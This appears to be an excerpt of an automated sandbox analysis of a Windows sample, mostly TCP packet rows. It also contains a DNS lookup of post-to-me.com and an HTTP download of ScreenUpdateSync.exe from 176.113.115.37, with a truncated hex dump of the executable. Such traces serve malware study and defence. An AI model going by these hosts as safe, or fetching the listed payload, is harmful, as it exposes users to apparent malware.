                                                Oct 26, 2024 08:56:09.788247108 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.788264990 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.788281918 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.788299084 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.788311005 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.788336039 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.788352966 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.788391113 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.788930893 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.789004087 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.903832912 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.903867006 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.903883934 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.903908014 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.903925896 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.903924942 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.903960943 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.903996944 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.904016018 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.904047012 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.904057026 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.904062986 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.904084921 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.904103041 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.904115915 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.904131889 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.904148102 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.904153109 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.904164076 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.904180050 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.904185057 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.904247999 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.904247999 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.904247999 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.905057907 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.905088902 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.905112028 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.905121088 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.905128956 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.905143023 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.905159950 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.905170918 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.905170918 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.905174017 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.905185938 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.905185938 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.905200005 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.905215025 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.946547031 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.946583033 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.946610928 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.946634054 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.020839930 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.020864010 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.020879030 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.020886898 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.020895958 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.020972967 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.020993948 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.021018028 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.021033049 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.021047115 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.021064997 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.021086931 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.021155119 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.021465063 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.021507978 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.021521091 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.021543980 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.021559954 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.021565914 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.021574974 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.021583080 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.021605015 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.021615982 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.022022963 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.022047997 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.022063017 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.022069931 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.022087097 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.022104025 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.022123098 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.022136927 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.022162914 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.022177935 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.062621117 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.062637091 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.062722921 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138092041 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138143063 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138163090 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138235092 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138268948 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138300896 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138334036 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138369083 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138401985 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138437033 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138442993 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138443947 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138443947 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138443947 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138470888 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138506889 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138533115 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138533115 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138562918 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138667107 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138731956 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138786077 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138820887 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138854027 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138890028 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.138972998 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138972998 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138972998 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138972998 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.138973951 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.139445066 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.139498949 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.139533043 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.139650106 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.139651060 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.139651060 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.178675890 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.178700924 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.178719044 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.178747892 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.178786039 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.179379940 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.179406881 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.179430962 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.179455042 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254595041 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254622936 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254662991 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254664898 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254678965 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254681110 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254694939 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254699945 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254719019 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254731894 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254744053 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254776955 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254800081 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254817963 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254834890 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254848003 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254901886 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254915953 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254934072 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254934072 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254946947 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.254952908 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254968882 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.254981041 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.255621910 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.255667925 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.255702972 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.255716085 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.255732059 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.255739927 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.255755901 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.255773067 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.255783081 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.255798101 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.255814075 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.255815983 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.255842924 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.255852938 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.256216049 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.256257057 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.256272078 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.256283045 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.256295919 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.256305933 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.295437098 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.295566082 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.295593977 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.295610905 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.295636892 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.295654058 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.340759039 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.340773106 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.340789080 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.340805054 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.340847015 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.340883017 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.371784925 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.371854067 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.371994019 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.372046947 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.372050047 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.372087955 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.372391939 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.372436047 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.372735023 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.372783899 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.372869015 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.372911930 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374619007 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374634981 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374650002 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374661922 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374682903 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374788046 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374809027 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374821901 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374825001 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374840975 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374846935 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374856949 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374862909 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374872923 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374880075 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374888897 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374902964 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374906063 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374913931 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374921083 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374933958 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374938011 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374948025 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374953032 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374959946 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374969959 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.374980927 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.374994993 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.375021935 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.413808107 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.413831949 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:10.413871050 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:10.413907051 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:14.037385941 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:14.037538052 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:16.147942066 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:16.153439045 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:16.153513908 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:16.153630972 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:16.158996105 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:17.037724972 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:17.037800074 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:17.041209936 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:17.046596050 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:18.476349115 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:18.476435900 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:23.501646996 CEST804970662.204.41.177192.168.2.5
                                                Oct 26, 2024 08:56:23.503283024 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:56:41.408124924 CEST4970680192.168.2.562.204.41.177
                                                Oct 26, 2024 08:57:55.267123938 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:57:55.579535961 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:57:56.189398050 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:57:57.391952038 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:57:59.798618078 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:58:04.611038923 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:58:14.220168114 CEST4970580192.168.2.5176.113.115.37

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 26, 2024 08:56:05.330073118 CEST5227253192.168.2.51.1.1.1
                                                Oct 26, 2024 08:56:05.419678926 CEST53522721.1.1.1192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 26, 2024 08:56:05.330073118 CEST192.168.2.51.1.1.10x64c0Standard query (0)post-to-me.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 26, 2024 08:56:05.419678926 CEST1.1.1.1192.168.2.50x64c0No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                Oct 26, 2024 08:56:05.419678926 CEST1.1.1.1192.168.2.50x64c0No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • post-to-me.com
                                                • 176.113.115.37
                                                • 62.204.41.177

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549705176.113.115.37804672C:\Users\user\Desktop\mCe4hBfqCT.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 26, 2024 08:56:07.607604027 CEST85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                User-Agent: ShareScreen
                                                Host: 176.113.115.37
                                                Oct 26, 2024 08:56:08.479167938 CEST1236INHTTP/1.1 200 OK
                                                Date: Sat, 26 Oct 2024 06:56:08 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Last-Modified: Sat, 26 Oct 2024 06:45:02 GMT
                                                ETag: "56000-6255b9332d227"
                                                Accept-Ranges: bytes
                                                Content-Length: 352256
                                                Content-Type: application/x-msdos-program
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f9 56 c7 b3 bd 37 a9 e0 bd 37 a9 e0 bd 37 a9 e0 00 78 3f e0 bc 37 a9 e0 a3 65 2d e0 a1 37 a9 e0 a3 65 3c e0 ac 37 a9 e0 a3 65 2a e0 e0 37 a9 e0 9a f1 d2 e0 b8 37 a9 e0 bd 37 a8 e0 c4 37 a9 e0 a3 65 23 e0 bc 37 a9 e0 a3 65 3d e0 bc 37 a9 e0 a3 65 38 e0 bc 37 a9 e0 52 69 63 68 bd 37 a9 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 12 12 b8 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 70 03 00 00 44 72 02 00 00 00 00 1f 17 00 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 75 02 00 04 00 00 4d bf 05 00 02 00 00 80 00 00 [TRUNCATED]
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$V777x?7e-7e<7e*7777e#7e=7e87Rich7PELepDr@uM< t8{.textpop `.rdataP"$t@@.data|p@.nuhiDs8@.rsrc8{ t|@@
                                                Oct 26, 2024 08:56:08.479228020 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 b0 43 00 75 02 f3 c3 e9 1a 07 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 91 08 00 00 8b
                                                Data Ascii: ;CuUQeVEPuuu9Et5t,M^UEVFuc@FHlHhN;CtCHpuF;CtFCHpuOFF@puHpF@
                                                Oct 26, 2024 08:56:08.479265928 CEST1236INData Raw: 40 50 ff 75 fc e8 44 2d 00 00 59 59 85 c0 74 31 c1 fb 02 50 8d 34 98 e8 18 0f 00 00 59 a3 48 c0 b3 02 ff 75 08 e8 0a 0f 00 00 89 06 83 c6 04 56 e8 ff 0e 00 00 59 a3 44 c0 b3 02 8b 45 08 59 eb 02 33 c0 5f 5e 5b c9 c3 8b ff 56 6a 04 6a 20 e8 ae 2c
                                                Data Ascii: @PuD-YYt1P4YHuVYDEY3_^[Vjj ,VHDujX^&3^jhCg""%euYEEE"%UuYH]U=pCu)ua'h$YY
                                                Oct 26, 2024 08:56:08.479298115 CEST1236INData Raw: 3b df 75 4c 39 3d 98 cb 43 00 74 33 56 e8 55 25 00 00 59 85 c0 0f 85 72 ff ff ff 8b 45 10 3b c7 0f 84 50 ff ff ff c7 00 0c 00 00 00 e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 0a 12 00 00 59 c3 3b df 75 0d 8b 45 10 3b c7 74 06 c7 00 0c 00 00 00 8b c3
                                                Data Ascii: ;uL9=Ct3VU%YrE;PE3ujY;uE;t-t"ttHt3VWh3FWP23~~~~CF+@Ou@Nu_^U
                                                Oct 26, 2024 08:56:08.479358912 CEST1236INData Raw: 83 c6 08 83 7d e0 04 89 75 e4 72 e9 8b c7 89 7b 04 c7 43 08 01 00 00 00 e8 67 fb ff ff 6a 06 89 43 0c 8d 43 10 8d 89 b4 b5 43 00 5a 66 8b 31 41 66 89 30 41 40 40 4a 75 f3 8b f3 e8 d7 fb ff ff e9 b7 fe ff ff 80 4c 03 1d 04 40 3b c1 76 f6 46 46 80
                                                Data Ascii: }ur{CgjCCCZf1Af0A@@JuL@;vFF~4C@IuCCSs3{95CXM_^3[jhCM}_huuE;CWh &"Y
                                                Oct 26, 2024 08:56:08.479394913 CEST1236INData Raw: c7 5f 5d c3 85 ff 74 37 85 c0 74 33 56 8b 30 3b f7 74 28 57 89 38 e8 c1 fe ff ff 59 85 f6 74 1b 56 e8 45 ff ff ff 83 3e 00 59 75 0f 81 fe b0 b6 43 00 74 07 56 e8 59 fd ff ff 59 8b c7 5e c3 33 c0 c3 6a 0c 68 b8 95 43 00 e8 22 14 00 00 e8 2c 03 00
                                                Data Ascii: _]t7t3V0;t(W8YtVE>YuCtVYY^3jhC",CFpt"~ltpluj LY5jYeFl=CiEEjYuUV5C5Ct!CtP5Ct'
                                                Oct 26, 2024 08:56:08.479429960 CEST1236INData Raw: 34 80 43 00 85 c0 75 07 56 e8 b2 11 00 00 59 8b f8 85 ff 0f 84 5e 01 00 00 8b 35 80 80 43 00 68 dc 82 43 00 57 ff d6 68 d0 82 43 00 57 a3 dc c6 43 00 ff d6 68 c4 82 43 00 57 a3 e0 c6 43 00 ff d6 68 bc 82 43 00 57 a3 e4 c6 43 00 ff d6 83 3d dc c6
                                                Data Ascii: 4CuVY^5ChCWhCWChCWChCWC=C5CCt=Ct=Ctu$CCCC$@5CCCC5CP5C5CC5CC5
